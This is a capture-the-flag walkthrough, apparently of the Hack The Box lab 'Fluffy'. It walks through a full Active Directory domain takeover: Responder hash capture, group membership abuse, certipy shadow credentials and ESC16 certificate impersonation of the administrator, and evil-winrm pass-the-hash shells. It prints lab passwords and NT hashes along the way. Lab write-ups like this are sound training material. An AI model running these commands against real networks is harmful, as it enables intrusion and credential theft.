Fluffy
Quickie
User
We are provided access to the user j.fleischman:J0elTHEM4n1990!.
Using netexec, we can quickly scan for share access to see where the user can read/write to.
netexec smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share We can easily see that IT share looks suspicious - let's use impacket-smbclient to check it out.
impacket-smbclient j.fleischman@10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 .
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 ..
drw-rw-rw- 0 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 22:31:07 2025 Upgrade_Notice.pdfUpgrade_notice.pdf suggest to use a particular cve - cloning it and using Responder gives us a callback!.
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.85]
Responder IPv6 [dead:beef:4::1053]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-I3SM06WIZWL]
Responder Domain Name [ZKM3.LOCAL]
Responder DCE-RPC Port [45843]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:8db68836481e820b:E7CA67E6FA52D8CE078F9DD8C82BA9DC:01010000000000000004A0DC17D5DB01A234CB70BDB43EAB00000000020008005A004B004D00330001001E00570049004E002D004900330053004D0030003600570049005A0057004C0004003400570049004E002D004900330053004D0030003600570049005A0057004C002E005A004B004D0033002E004C004F00430041004C00030014005A004B004D0033002E004C004F00430041004C00050014005A004B004D0033002E004C004F00430041004C00070008000004A0DC17D5DB0106000400020000000800300030000000000000000100000000200000BCC9F77CEF3A5344C19CD6ACA6DC3E43C26C4CC18FA1518DF4CD129014BDCAAE0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380035000000000000000000Cracking it gives us access to the user p.agila:prometheusx-303.
As always, use bloodhound to map out possible AD attack vectors.
GenericAll lets us basically do anything to the group Service Accounts - we can add the newly obtained p.agila to it with net rpc
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svcGenericWrite lets us do either a targeted kerberoasting attack or shadow credentials attack (requires ADCS). Let's opt for shadow credentials as there is the presence of ca_svc here which suggest the use of ADCS.
certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls
Directory: C:\Users\winrm_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/17/2025 11:56 AM Desktop
d-r--- 5/19/2025 9:15 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/3/2025 10:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
<REDACTED>Root
winrm_svc has GenericWrite writes to the users ldap_svc and ca_svcwhich means we can perform the shadow credentials attack again to retrieve their respective NThash.
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8ca_svc is part of the Cert Publisher Group which when queried with certipy, is vulnerable to ESC16
Looking at the documentation, we will go with scenario A as we fufill the criteria from the previous owned users.
First, we need to set the upn of our victim account ca_svc to administrator@fluffy.htb
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'administrator@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'Next, we need to request for the certificate with the associated spn using the victim account ca_svc, specifying a template such as User
certipy-ad -debug req -k -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
(request, answer) = resolution.next_request()
~~~~~~~~~~~~~~~~~~~~~~~^^
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Lastly, we need to revert the upn before authenticating as Administrator
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
certipy-ad auth -pfx administrator@fluffy.htb -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
<REDACTED>
Last updated